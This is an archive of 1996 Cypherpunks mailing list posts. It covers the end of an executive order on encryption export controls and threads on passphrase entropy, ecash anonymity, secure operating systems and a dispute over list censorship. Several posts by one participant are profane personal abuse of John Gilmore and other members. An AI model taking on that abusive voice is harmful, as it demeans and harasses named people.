  to the following conditions:  (a)  I have determined that the 
  export of encryption products described in this section could 
  harm national security and foreign policy interests even where 
  comparable products are or appear to be available from sources 
  outside the United States, and that facts and questions 
  concerning the foreign availability of such encryption products 
  cannot be made subject to public disclosure or judicial review 
  without revealing or implicating classified information that 
  could harm United States national security and foreign policy 
  interests.  Accordingly, sections 4(c) and 6(h)(2)-(4) of 
  the Export Administration Act of 1979 ("the EAA"), 50 U.S.C. 
  App. 2403(c) and 2405(h)(2)-(4), as amended and as continued 
  in effect by Executive Order 12924 of August 19, 1994, and 
  by notices of August 15, 1995, and August 14, 1996, all 
  other analogous provisions of the EAA relating to foreign 
  availability, and the regulations in the EAR relating to such 
  EAA provisions, shall not be applicable with respect to export 
  controls on such encryption products.  Notwithstanding this, 
  the Secretary of Commerce ("Secretary") may, in his discretion, 
  consider the foreign availability of comparable encryption 
  products in determining whether to issue a license in a 
  particular case or to remove controls on particular products, 
  but is not required to issue licenses in particular cases or 
  to remove controls on particular products based on such 
  consideration;
  
       (b)  Executive Order 12981, as amended by Executive 
  Order 13020 of October 12, 1996, is further amended as follows:
  
       (1)  A new section 6 is added to read as follows:  
  "Sec. 6.  Encryption Products.  In conducting the license 
  review described in section 1 above, with respect to export 
  controls of encryption products that are or would be, on 
  November 15, 1996, designated as defense articles in Category 
  XIII of the United States Munitions List and regulated by the 
  United States Department of State pursuant to the Arms Export 
  Control Act, 22 U.S.C. 2778 et seq., but that subsequently are 
  placed on the Commerce Control List in the Export Administration 
  Regulations, the Departments of State, Defense, Energy, and 
  Justice and the Arms Control and Disarmament Agency shall have 
  the opportunity to review any export license application 
  submitted to the Department of Commerce.  The Department of 
  Justice shall, with respect to such encryption products, be a 
  voting member of the Export Administration Review Board 
  described in section 5(a)(1) of this order and of the Advisory 
  Committee on Export Policy described in section 5(a)(2) of this 
  order.  The Department of Justice shall be a full member of the 
  Operating Committee of the ACEP described in section 5(a)(3) of 
  this order, and of any other committees and consultation groups 
  reviewing export controls with respect to such encryption 
  products."
  
       (2)  Sections 6 and 7 of Executive Order 12981 of 
  December 5, 1995, are renumbered as new sections 7 and 8, 
  respectively.
  
       (c)  Because the export of encryption software, like the 
  export of other encryption products described in this section, 
  must be controlled because of such software's functional 
  capacity, rather than because of any possible informational 
  value of such software, such software shall not be considered 
  or treated as "technology," as that term is defined in 
  section 16 of the EAA (50 U.S.C. App. 2415) and in the EAR 
  (61 Fed. Reg. 12714, March 25, 1996);
  
       (d)  With respect to encryption products described in this 
  section, the Secretary shall take such actions, including the 
  promulgation of rules, regulations, and amendments thereto, as 
  may be necessary to control the export of assistance (including 
  training) to foreign persons in the same manner and to the same 
  extent as the export of such assistance is controlled under the 
  AECA, as amended by section 151 of Public Law 104-164;
  
       (e)  Appropriate controls on the export and foreign 
  dissemination of encryption products described in this section 
  may include, but are not limited to, measures that promote the 
  use of strong encryption products and the development of a key 
  recovery management infrastructure; and
  
       (f)  Regulation of encryption products described in this 
  section shall be subject to such further conditions as the 
  President may direct.
  
       Sec. 2.  Effective Date.  The provisions described in 
  section 1 shall take effect as soon as any encryption products 
  described in section 1 are placed on the Commerce Control List 
  in the EAR.
  
       Sec. 3.  Judicial Review.  This order is intended only to 
  improve the internal management of the executive branch and to 
  ensure the implementation of appropriate controls on the export 
  and foreign dissemination of encryption products.  It is not 
  intended to, and does not, create any rights to administrative 
  or judicial review, or any other right or benefit or trust 
  responsibility, substantive or procedural, enforceable 
  by a party against the United States, its agencies or 
  instrumentalities, its officers or employees, or any other 
  person.
  
  
  
                                WILLIAM J. CLINTON
  
  THE WHITE HOUSE,
      November 15, 1996.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 15 Nov 1996 20:18:30 -0800 (PST)
To: snow@smoke.suba.com (snow)
Subject: Re: A question about PGP Pass phrases.
In-Reply-To: <199611130715.BAA00511@smoke.suba.com>
Message-ID: <199611160415.XAA01631@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Tim May & I had a conversation about this in which Tim posted the
great analogy of searching galaxies in the possible passphrase space.
The thread covered the question pretty well.

Adam

(Tim, do you have a copy of your post?  I can't think of the right
search terms for Altavista)

snow wrote:
|      A very basic question then:
| 
|      What _would_ be a passphrase of sufficient length and entropy? 
| 
|      I would assume that the phrase "Off we go, into the while blue yonder"
| would not be sufficient, but what about "0ff they went, in'ta the black viod"?
| 
|      I would guess that either would be difficult to out right guess, but the 
| second would be considerably less likely. Not as unlikely as 
| "KIB&^%(*h89hgv&*hjV6*ibHF&90n", but a hell of a lot easier to remember.
| 
|     It has been several months since I read the PGP users guide, and I don't 
| remember any discussion of that in it, but I could be wrong. 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 15 Nov 1996 20:34:10 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: [POLITICS] Re: Members of Parliament Problem
In-Reply-To: <v02140b01aeb231abd199@[192.0.2.1]>
Message-ID: <199611160431.XAA01797@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:
| At 9:32 AM 11/15/1996, Adam Shostack wrote:
| >         Most of the usual arguments about disallowing anonymity
| > actually apply to a Parliment.  There is a responsibility involved in
| > the execution of power.
| 
| >         This is not to condone attacking children, or killing ones
| > political opponents.  For an MP to imply that something he wants to
| > say will likely get him/his kids killed probably means that he wants
| > to use the power of the state in some way likely to quite upset at
| > least a few people.  If this is the case, then allowing him to
| > anonymously, and without responsibility, direct the power of the state
| > is congruent to tyranny.
| 
| Please allow me to respectfully disagree.

	No! :)

| Let's consider another issue: recreational drugs.  We can be pretty
| sure that a sizeable number of Congressmen use marijuana and see
| no reason for it to be illegal.  Yet, to speak about it would be
| understood to be political suicide with possible legal repercussions.
| Were Congressmen able to speak anonymously, such an issue could be
| discussed.  It is more likely that good policy results from discussion.

	So, if 'anonymous Senator' came out for legalization, it would
be declared that it was Kennedy, source of all Liberal Evil.  Good
policy comes from leaders standing up and leading.  Since they don't,
I'm a crypto-anarchist.  To try and help the Congress become more
effective is not in anyones interest, except that class of person who 
makes their living off the workings of government.

	There are lots of variations on the argument that politics is
from the greek poly, meaning many, and ticks, a small bloodsucking
animal.  My interest in creating new, consensual realities is that I
don't want to be forced to care about the congress.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 15 Nov 1996 23:30:12 -0800 (PST)
To: Adam Shostack <cypherpunks@toad.com
Subject: Passwords as Galaxies, and Status of the Archives
In-Reply-To: <199611130715.BAA00511@smoke.suba.com>
Message-ID: <v03007804aeb31c5c2260@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 PM -0500 11/15/96, Adam Shostack wrote:
>Tim May & I had a conversation about this in which Tim posted the
>great analogy of searching galaxies in the possible passphrase space.
>The thread covered the question pretty well.
>
>Adam
>
>(Tim, do you have a copy of your post?  I can't think of the right
>search terms for Altavista)

The name of my post was "Passwords as Galaxies." Alas, it does not show up
in an Alta Vista search, so it's probably not in the few archived periods
still available (*).

The approximate date was mid-June 1996. I know this from some followup
posts I still have. Unfortunately, my increasingly twitchy Macintosh--an
architecture that appears to be sinking under the weight of inconsistent
versions, extensions, and other such cruftiness--has dropped a lot of
chunks of my Eudora archives. My backups may have the missing sections, but
I don't have time to sort through them now.

Someone else should have it. Mid-June. "Passwords as Galaxies."

(* And speaking of the Cypherpunks archives, has anyone heard _anything_
from Todd Masco about progress on his site? His Web page,
http://www.hks.net/cpunks/index.html, just reports the same old news:

------------
"March 18, 1996

The cypherpunks and coderpunks pages will be unavailable for the next
couple of days as we switch over to a new line. We apologize for any
inconvenience this might cause.


June 06, 1996

Not to worry, we know the archives are still down. Just a bit longer,
Please be patient."
--------------

Someone alluded to threats by large newspapers to prosecute Copyright
violations (that is, the archive site perpetuates copyright violations, and
Web search engines compound the seriousness) as being a reason the archive
have not come back up. Anyone know if this is really true?

Todd, are you still reading us?

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Fri, 15 Nov 1996 20:41:31 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961113061359.725B-100000@well.com>
Message-ID: <Pine.LNX.3.95.961115233704.106A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Nov 1996, Declan McCullagh wrote:

> Yes, I understand this. It's quite obvious; being removed from the
> subscriber list hasn't slowed Vulis at all. When I was writing the piece
> Vulis seemed to have slowed his ad hominem attacks and instead was talking
> about censorship (something that is within the charter of the list), but
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
		    
Actually, Declan, it's not.  "info cypherpunks" in the body of a message to
majordomo@toad.com yields the welcome message to the list -- the closest
thing to a charter available.  The subjects of censorship and free speech
are neither mentioned nor alluded to anywhere within that document.

The subjects of censorship & free speech do bear some relationship to the
list's expressed subject and are certainly near and dear to most cypherpunk
hearts.  The government cannot prevent us from discussing the implications 
of privacy enabled by strong crypto.  

Free speech & censorship may even be interesting, entertaining, & important
topics -- hence their consistent recurrance in discussions.  But the above 
assertion is factually wrong.



_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Terry Wright <dactyl@mail.zynet.co.uk>
Date: Fri, 15 Nov 1996 16:10:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <1.5.4.32.19961116000659.00667988@mail.zynet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>It just "looks" that way on the net.  I do live-fucking, newsgroup
>flooding, mailbombing, vote-tampering and defamation all legally,
>and OPENLY on the InterNet.
>
>The more you PGP, the worse you look.  Nobody reads your e-mail,
>so stop being so paranoid.
>
>-aga
>
>
Who is this idiot?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Fri, 15 Nov 1996 22:09:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ideal secure personal computer system
Message-ID: <3.0.32.19961116000841.0095b850@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:11 PM 11/15/96 -0800, you wrote:
>Since others have mentioned Macs in this thread, and since I have a Mac, I
>should point out that booting from a locked startup disk is possible, even
>common. Namely, a CD-ROM.
Next time you try booting off of a locked startup disk, try opening the
chooser.  It won't open because to use the chooser requires the startup
disk to be unlocked.  (Last time I checked)
>What an OS would _like_ to write is not the same thing as what it _must_
write.
Yeah, but on mac, some basic functions must write to the boot drive.

--
______________________________________________________________________________
Ted Cabeen         http://shadowland.rh.uchicago.edu         cabeen@netcom.com
Check Website or finger for PGP Public Key        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province." -F. Bacon   cococabeen@aol.com
"Human kind cannot bear very much reality."-T.S.Eliot 73126.626@compuserve.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 16 Nov 1996 06:43:30 -0800 (PST)
To: frantz@netcom.com (Bill Frantz)
Subject: Re: ideal secure personal computer system
In-Reply-To: <199611152314.PAA06897@netcom6.netcom.com>
Message-ID: <199611160624.AAA10312@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Bill Frantz wrote:
> Protection against strangers walking up to your machine and using it is
> nice, and easy to do.  Protection against viruses which install Trojan
> horses in your system would also be nice, but is very hard to do in systems
> where programs run with all the privileges of their users.  Examples
> include (in alpha order): DOS, MacOS, Unix, and Windows (including NT).

I wonder what are the operating systems where programs may be run with
_less_ privileges than the user who starts them? Is VMS one of such 
systems?

thanks

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 16 Nov 1996 00:43:07 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: National Emergency
In-Reply-To: <1.5.4.32.19961116025012.00719c0c@pop.pipeline.com>
Message-ID: <Pine.3.89.9611160011.A20385-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, John Young wrote:

> Hal Finney wrote:
> 
> >I found interesting is that it refers to the fact that we are currently
> >living under a state of national emergency!  [Snip]
> 
> The same emergency was invoked for the same purpose in December,
> 1995, with citation of the elusive EO 12924 identical to the latest EO.

Sorry if I am a bit slow here. We are under a state of emergency?

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Sat, 16 Nov 1996 00:49:35 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Passwords as Galaxies, and Status of the Archives
In-Reply-To: <v03007804aeb31c5c2260@[207.167.93.63]>
Message-ID: <Pine.3.89.9611160013.A20385-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


I think it was "Passwords are galaxies in hyperspace". I may be wrong. 
Either way, this was an excellent tread.


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Member JPFO. "America's Aggressive Civil Rights Organization"

On Fri, 15 Nov 1996, Timothy C. May wrote:

> At 11:15 PM -0500 11/15/96, Adam Shostack wrote:
> >Tim May & I had a conversation about this in which Tim posted the
> >great analogy of searching galaxies in the possible passphrase space.
> >The thread covered the question pretty well.
> >
> >Adam
> >
> >(Tim, do you have a copy of your post?  I can't think of the right
> >search terms for Altavista)
> 
> The name of my post was "Passwords as Galaxies." Alas, it does not show up
> in an Alta Vista search, so it's probably not in the few archived periods
> still available (*).
> 
> The approximate date was mid-June 1996. I know this from some followup
> posts I still have. Unfortunately, my increasingly twitchy Macintosh--an
> architecture that appears to be sinking under the weight of inconsistent
> versions, extensions, and other such cruftiness--has dropped a lot of
> chunks of my Eudora archives. My backups may have the missing sections, but
> I don't have time to sort through them now.
> 
> Someone else should have it. Mid-June. "Passwords as Galaxies."
> 
> (* And speaking of the Cypherpunks archives, has anyone heard _anything_
> from Todd Masco about progress on his site? His Web page,
> http://www.hks.net/cpunks/index.html, just reports the same old news:
> 
> ------------
> "March 18, 1996
> 
> The cypherpunks and coderpunks pages will be unavailable for the next
> couple of days as we switch over to a new line. We apologize for any
> inconvenience this might cause.
> 
> 
> June 06, 1996
> 
> Not to worry, we know the archives are still down. Just a bit longer,
> Please be patient."
> --------------
> 
> Someone alluded to threats by large newspapers to prosecute Copyright
> violations (that is, the archive site perpetuates copyright violations, and
> Web search engines compound the seriousness) as being a reason the archive
> have not come back up. Anyone know if this is really true?
> 
> Todd, are you still reading us?
> 
> --Tim May
> 
> 
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Reece <reece@taz.nceye.net>
Date: Fri, 15 Nov 1996 17:04:41 -0800 (PST)
To: ph@netcom.com
Subject: Re: Remailer Abuse Solutions
In-Reply-To: <v02140b05aeb13a70acf4@[192.0.2.1]>
Message-ID: <19961116010422.15952.qmail@taz.nceye.net>
MIME-Version: 1.0
Content-Type: text/plain


   Content-Type: text/plain; charset="us-ascii"
   Date: Thu, 14 Nov 1996 14:40:29 -0800
   From: ph@netcom.com (Peter Hendrickson)



   E-cash, the product licensed by Digicash, offers full payee anonymity and
   would be an ideal candidate.


  ECASH AND PRIVACY

One of the unique features of ecash is payer anonymity. When paying
with ecash the identity of the payer is not revealed
automatically. This way the payer stays in control of information
about himself. During a payment a payer can of course identify
himself, but only when he chooses so.

Ecash offers one-sided anonymity; when clearing a transaction the
payee is identified by the bank.

    (according to http://www.digicash.com/ecash/about.html)



But what about Okamoto and Ohta's digital cash scheme published in
Crypto '91?  It appears to be fully untraceable and transferable.  Of
course, I haven't heard of anyone trying to use this scheme (has it
been broken?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Sat, 16 Nov 1996 01:52:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Giving Kill Files a Workout...
Message-ID: <3.0b36.32.19961116015217.00e4c738@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


What a week!  What is this?  "Net Loon pig-pile on Cypherpunks day?"

So far i have killfiled three people in the past two days.  (That is the
total number I filtered to trash before that date.)

For those of you who are sick of wading through this mess, I am willing to
show you what it will take to filter those of your choice to /dev/null or
its local equivelent. (procmail can be your friend!)

Maybe after some creative filtering, the list will settle back to the usual
noise, instead of the net-loon noise.



---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Fri, 15 Nov 1996 23:25:08 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Mirror of new export control regulations
In-Reply-To: <v03007801aeb2f057ca8e@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.961116015745.877B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Looks like a trend.  

  In his day job, U.S. Army Maj. Ralph Peters is a strategist for the
  White House Drug czar.  In his spare time, he is a best-selling novelist
  - a kind of thinking man's Tom Clancy - whose previous five books have
  sales totaling at least a million copies world-wide. 
 
  [...H]is next novel, "Twilight of the Heroes," to be published next
  month (Avon, 464 pages, $6.50), is a sharp critique of the U.S. war
  against drug smuggling from South America.

  [...Peters says] a lot is going right in U.S. drug policy nowadays,
  which he calls "a disaster" before Gen. McCaffrey took over.

  [...] Using fiction, he says, lets him speak to a wider audience: "If I
  had written a clinical study of drug policy, it might have sold 2,000
  copies." [...]

    - WSJ, 11/12/96, review by T.E. Ricks, Pentagon Correspondent

In his day job, by the way, Maj. Peters authors articles arguing for
assassination of drug criminals and such.  Much more efficient than
bothering with evidence, trials, and such nuisances.

bd

On Fri, 15 Nov 1996, Timothy C. May wrote:

> At 9:10 PM -0500 11/15/96, Alan Davidson wrote:
> >>http://www.law.miami.edu/~froomkin/nov96-regs.htm
> >
> >
> >It gets even more interesting.  In addition to signing today's Executive
> >Order on encryption, the President also designated Ambassador David L.
> >Aaron as the new "Special Envoy for Cryptography."  (Really, I'm not making
> >this up.)
> 
> Could this be the same David Aaron who writes thriller novels about nuclear
> terrorism?
> 
> 
> (I don't know that it is, by the way, nor am I making a joke. A David
> Aaron, with also diplomatic ties, wrote at least one fine thriller some
> years back. If he's the crypto czar, he can probably spin an appropriately
> scary story to tell the recalcitrant Third Worlders he'll be dealing
> with...countries like France, Britain, etc.)
> 
> --Tim May
> 
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
> that the National Security Agency would try to twist their technology."
> [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silly@ugcs.caltech.edu ((me))
Date: Fri, 15 Nov 1996 20:26:36 -0800 (PST)
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: National Emergency
In-Reply-To: <cypherpunks.v03007800aeb2dc721dbf@[207.167.93.63]>
Message-ID: <56jfp1$l8r@gap.cco.caltech.edu>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

>Use the source, young Hal! While the White House Web site may not have it
>online, Alta Vista turns up 113 hits (though not all valid) to it.

>Basically, this was one of the alphabet soup of Emergency Orders, National
>Security Decision Directives, and Executive Decisions passed or enacted
>(sometimes in secrecy) during the last 30 years of the Continuing Emergency.
I've spent a great deal of time looking for an archive of these sorts of 
actions, especially executive orders, but in general *all* the crap that
spews from the White House.  Is there one?  Most of my searches led to
dead links.  

I know that the WhiteHouse.gov site has Clinton's EO's (searchable, or,
with a little finagling, a list of them), but I want *all* of them.

I'd love to see a site which has all these things.

(me)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 16 Nov 1996 02:28:22 -0800 (PST)
Subject: Fat Cocksucker John Gilmore-ASSHOLE!
Message-ID: <199611161028.EAA12575@mailhost.onramp.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, Mike McNally wrote:

> Date: Fri, 15 Nov 1996 09:03:48 -0600
> From: Mike McNally <m5@tivoli.com>
> Reply-To: freedom-knights@jetcafe.org
> To: aga <aga@dhp.com>
> Cc: freedom-knights@jetcafe.org, Dave Hayes <dave@kachina.jetcafe.org>,
>     declan@well.com, InterNet Freedom Council <ifc@pgh.org>,
>     cypherpunks@toad.com
> Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
> 
> aga wrote:
> > 
> > No it ain't; not after the list gets so big.  Public newsgroups
> > lose all rights of censorship by the owners, and that is law.
> 
> Guffaw, guffaw.
> 
PUKE , PUKE !!!  You are a stupid bastard to laugh.

> (So what if John decided simply to pull the plug on toad in order to
> plug in a new hot tub?)
> 

So what the fuck?  That matters not.  The point is that the 
cypherpunks is an "all or nothing" proposition.  There is no
"in between" allowed any more.  After a certain level, EVERYTHING
reaches the "public doamin," and that is the *common-law of
cyberspace.*

Like, why is the fatso John Gilmore out here talking about this?
Steve Boursy says all of this should go to UseNet, so it goes.

> ______c_________________________________________________________________
> Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
> mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
> http://www.io.com/~m101/                 * processing" are different!
> 

We want John Gilmore to respond to this censorous matter on the net.

-aga







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 16 Nov 1996 01:36:21 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Fat Cocksucker John Gilmore-ASSHOLE!
In-Reply-To: <328C8654.4813@tivoli.com>
Message-ID: <Pine.LNX.3.95.961116042518.3091C-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, Mike McNally wrote:

> Date: Fri, 15 Nov 1996 09:03:48 -0600
> From: Mike McNally <m5@tivoli.com>
> Reply-To: freedom-knights@jetcafe.org
> To: aga <aga@dhp.com>
> Cc: freedom-knights@jetcafe.org, Dave Hayes <dave@kachina.jetcafe.org>,
>     declan@well.com, InterNet Freedom Council <ifc@pgh.org>,
>     cypherpunks@toad.com
> Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
> 
> aga wrote:
> > 
> > No it ain't; not after the list gets so big.  Public newsgroups
> > lose all rights of censorship by the owners, and that is law.
> 
> Guffaw, guffaw.
> 
PUKE , PUKE !!!  You are a stupid bastard to laugh.

> (So what if John decided simply to pull the plug on toad in order to
> plug in a new hot tub?)
> 

So what the fuck?  That matters not.  The point is that the 
cypherpunks is an "all or nothing" proposition.  There is no
"in between" allowed any more.  After a certain level, EVERYTHING
reaches the "public doamin," and that is the *common-law of
cyberspace.*

Like, why is the fatso John Gilmore out here talking about this?
Steve Boursy says all of this should go to UseNet, so it goes.

> ______c_________________________________________________________________
> Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
> mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
> http://www.io.com/~m101/                 * processing" are different!
> 

We want John Gilmore to respond to this censorous matter on the net.

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 16 Nov 1996 02:08:56 -0800 (PST)
To: "James A. Tunnicliffe" <Tunny@inference.com>
Subject: RE: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <c=US%a=_%p=Inference%l=LANDRU-961115201523Z-5419@landru.novato.inference2.com>
Message-ID: <Pine.LNX.3.95.961116050451.3091G-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, James A. Tunnicliffe
 wrote:

> Date: Fri, 15 Nov 1996 12:15:23 -0800
> From: "James A. Tunnicliffe" <Tunny@inference.com>
> To: 'aga' <aga@dhp.com>
> Cc: 'cypherpunks' <cypherpunks@toad.com>
> Subject: RE: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> Aga wrote:
> > > >Why?  Are you a criminal?
> > > >What are you hiding behind your PGP?
> > > 
> > > Okay, I'll bite.  Where is it said that a person who wants h[is,er]
> > > privacy
> > > is a criminal?  Charlie McCarthy might have said that.
> 
> [...deletia...]
> 
> > The more you PGP, the worse you look.  Nobody reads your e-mail,
> > so stop being so paranoid.
> >
> > -aga
> 
> Sigh. I really don't have time for unimaginative trollers, and
> you've caught your limit, so into the killfile you go. Still, I
> would appreciate it if you could see your way clear to quit
> posting these trolls on cypherpunks, since it does make it harder
> to effectively filter the responses from people who make the
> mistake of taking you seriously.
> 

Look dude, I do not post anything to cypherpunks; I never joined the
mailing list, so that list is irrelevant.

> Thank you for your kind consideration,
> 

That is kool, dude.  But tell me; just why the hell did you
put the cypherpunks mailing list in the header?  I never joined the
fucking list, so nothing that i write would go to that list.
See, right away, you have the appearance of a back-stabber.

> Tunny
> ======================================================================
>  James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
>  Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
>  tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
> ======================================================================
> 
> 

Again, only suspicious people use PGP.  get ready to fuck and
wipe your ass in public.

-a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sat, 16 Nov 1996 02:25:35 -0800 (PST)
To: rent_control@msn.com (Stephen Boursy)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <UPMAIL07.199611151356330254@msn.com>
Message-ID: <9611161024.AA00954@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text


Stephen Boursy wrote, along with a horde of others with no lives:
[lots of worthless crap snipped out]
> 
> None of that analogy is applicable to the cyberpunks list.
> When a list gets as big as that, it it no longer to be considered
> a "mailing-list" but it is a _public_ forum.  The whole problem
> here is the abuse of power by both the EFF and John Gilmore.
> 
It's not an abuse of power. It was an effort to curtail inappropriate
SPAM. Much like this entire topic has become non-crypto SPAM on the
cypherpunks list. 
> 
>   Well then let's put their precious censored mailing list in 
> the public domain.

Hmm, above that you tried to argue that it wasn't a list, but a
"public forum", logicly then you state that it is allready in
the "public domain". Then you turn around and say it isn't, and
should be taken from a private forum into the "public domain".
Perhaps if you stopped ranting, you might realize your mistake. 

> 
> 
> Wrong!  The cyberpunks mailing list is PUBLIC property and should
> NOT be controlled by John Gilmore!  This just goes to show the real
> facist censorship motives that the EFF has behind it.

Ahh, but you previously said it wasn't public property. 
That aside, just because you say it is, doesn't mean it's so. Now
I realize that up there at MonopolySoft, that sort of logic actually
works, but in the real world it doesn't. The content may very well be
"public property" as such, but the list itself, and where it resides
are not public property. 

> 
> Time to kill the EFF, and let it rot in hell.  They are disgrace
> to the entire InterNet community.  I run 6 different mailing lists,
> and have NEVER puled the plug on anyone, even when they criticize me.

Please, the EFF is NOT a Cypherpunks organization. They may share
some of the same goals, but they arn't the same. This should be obvious
to even the most logicly deficient. 
Oh, and it's spelled "internet", and when use inside a sentance, it isn't
capitolized, no matter what Bill tells you. And if you pulled the plug
on any of your 6 lists, the members would have the option of reforming
another list someplace else, but it would be YOUR OPTION to pull the
plug, unless you were "only" the adminstrator, and not the list "owner".
John owns the list in the classic sense. (Ok I realize I may have lost
